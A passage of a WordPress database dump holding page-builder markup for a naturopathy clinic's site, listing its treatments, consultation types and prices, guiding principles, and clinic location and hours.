header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_5\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"3-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li>Capsules/tablets<span style=\"font-family: Montserrat;\"></span></li>\n<li>Teas</li>\n<li>Topical creams</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"4-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Food as medicine</span></li>\n<li><span style=\"font-family: Montserrat;\">Nutritional compounds</span></li>\n<li><span style=\"font-family: Montserrat;\">Supplements</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"5-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"2-01\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 11:09:36','2021-05-25 03:09:36','',28,'https://verde.desidrivers.com.au/?p=132',0,'revision','',0),(139,1,'2021-05-25 20:25:49','2021-05-25 12:25:49','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic 